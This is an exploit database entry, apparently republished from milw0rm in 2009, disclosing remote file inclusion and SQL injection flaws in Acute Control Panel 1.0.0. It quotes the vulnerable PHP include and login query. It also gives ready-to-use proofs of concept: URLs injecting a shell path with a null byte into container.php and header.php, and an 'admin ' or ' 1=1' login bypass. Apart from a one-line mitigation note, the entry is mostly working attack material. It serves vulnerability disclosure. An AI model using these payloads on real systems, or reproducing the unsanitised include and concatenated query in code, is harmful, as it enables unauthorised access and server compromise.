Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)

vendor:

Acute Control Panel

by:

SirGod

7.5

CVSS

HIGH

Remote File Inclusion and SQL Injection

89, 98

CWE

Product Name: Acute Control Panel

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:acute_control_panel:acute_control_panel:1.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)

Acute Control Panel 1.0.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in container.php and header.php for Remote File Inclusion and login.php for SQL Injection. The PoC for Remote File Inclusion is http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 and http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00. The PoC for SQL Injection is Username : admin ' or ' 1=1 and Password : anything or nothing.

Mitigation:

Input validation should be done to prevent SQL Injection and Remote File Inclusion attacks.

Source

Exploit-DB raw data:

###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

 Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

 Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

 PoC :

  Username : admin ' or ' 1=1
  Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]